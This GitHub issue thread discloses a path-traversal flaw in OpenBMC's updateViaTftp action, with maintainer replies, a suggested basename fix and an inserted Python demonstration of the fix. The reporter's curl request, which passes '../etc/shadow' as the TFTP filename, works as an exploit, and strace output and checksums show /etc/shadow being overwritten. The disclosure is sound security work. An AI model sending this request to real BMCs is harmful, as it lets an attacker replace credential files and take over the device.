
[security] overwrite any file on the bmc with updateViaTftp #133

Closed
ya-mouse opened this issue Dec 7, 2016 · 5 comments

@ya-mouse

ya-mouse commented Dec 7, 2016

I've found a security hole that allows overwriting any bmc file via the updateViaTftp command:

curl -v -b cjar -k -X POST -H "Content-Type: application/json" \
   -d '{"data": ["10.1.0.1", "../etc/shadow"]}' \
   https://10.1.0.102/org/openbmc/control/flash/bmc/action/updateViaTftp

This will overwrite /etc/shadow on the bmc with the user's content from "etc/shadow" on the tftp server.

Before exploiting:

# md5sum /etc/shadow
7f2131b66f559a79b7198b64a8577048 /etc/shadow

Here is part of the strace log from the /usr/sbin/download_manager.py process:

[pid  2520] open("/tmp/../etc/shadow", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
[pid  2520] sendto(3, "\0\1../etc/shadow\0octet\0", 22, 0, {sa_family=AF_INET, sin_port=htons(69), sin_addr=inet_addr("10.1.0.1")}, 16) = 22
[pid  2520] recvfrom(3, "\0\3\0\1root:$1$UGMqyqdG$FZiylVFmRRf"..., 516, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, [16]) = 516
[pid  2520] connect(3, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 0
[pid  2520] write(4, "root:$1$UGMqyqdG$FZiylVFmRRfl9Z0"..., 512) = 512
[pid  2520] sendto(3, "\0\4\0\1", 4, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 4
[pid  2520] read(3, "\0\3\0\2:*:17141:0:99999:7:::\navahi:"..., 516) = 133
[pid  2520] write(4, ":*:17141:0:99999:7:::\navahi:!:17"..., 129) = 129

After upload:

# md5sum /etc/shadow
28f761c4178e7f709a5bdce6943c4496  /etc/shadow

@williamspatrick
Member

We plan to get rid of download_manager.py in its current form. I'll look and see if there is an easy way to clean this up now though.

@ya-mouse
Author

ya-mouse commented Dec 8, 2016

Just take the basename of the filename in:
https://github.com/openbmc/skeleton/blob/master/pydownloadmgr/download_manager.py#L59
or use temporary names.

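The traversal shown in the strace above and the basename fix proposed in the comment, as an added example in Python that is not the skeleton project's own code; DOWNLOAD_DIR, the function names and the sample filenames are assumptions:

```python
import posixpath

# Constructed example, not the skeleton project's own code. The download
# directory is the one the strace above shows the TFTP client writing into.
DOWNLOAD_DIR = "/tmp"


def is_inside_download_dir(path: str) -> bool:
    """True if the normalised path still lies under DOWNLOAD_DIR.
    normpath is a pure string operation, so this runs without touching the
    filesystem; on a real device resolve symlinks with os.path.realpath first."""
    resolved = posixpath.normpath(path)
    return posixpath.commonpath([DOWNLOAD_DIR, resolved]) == DOWNLOAD_DIR


def vulnerable_local_path(filename: str) -> str:
    """Naive join: the client-supplied TFTP filename is appended to /tmp
    unchanged, so '../etc/shadow' becomes /tmp/../etc/shadow, i.e. /etc/shadow."""
    return posixpath.join(DOWNLOAD_DIR, filename)


def safe_local_path(filename: str) -> str:
    """Keep only the last path component (the basename fix suggested above),
    reject empty or dot names, then re-check containment before opening."""
    base = posixpath.basename(filename)
    if base in ("", ".", ".."):
        raise ValueError(f"refusing TFTP filename {filename!r}")
    path = posixpath.join(DOWNLOAD_DIR, base)
    if not is_inside_download_dir(path):
        raise ValueError(f"{path} escapes {DOWNLOAD_DIR}")
    return path


if __name__ == "__main__":
    # Constructed sample filenames: a normal image name plus traversal variants.
    for name in ("image.bin", "../etc/shadow", "/etc/shadow", "sub/../../etc/passwd", ".."):
        naive = vulnerable_local_path(name)
        try:
            fixed = safe_local_path(name)
        except ValueError as exc:
            fixed = f"rejected ({exc})"
        print(f"{name!r:24} naive={naive!r:30} inside={is_inside_download_dir(naive)!s:5} fixed={fixed}")
```

Note that posixpath.join discards DOWNLOAD_DIR entirely when the filename is absolute, so a leading slash is as dangerous as a leading "../"; the basename step handles both.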
@williamspatrick
Member

Once we get the new TFTP server in we should disable the one from skeleton. When that happens this issue can be closed. We are ensuring the new TFTP server does not have this issue.

@rfrandse

rfrandse commented Jul 5, 2017

Issue moved to openbmc/openbmc #1898 via ZenHub

@gtmills
Member

gtmills commented May 23, 2018
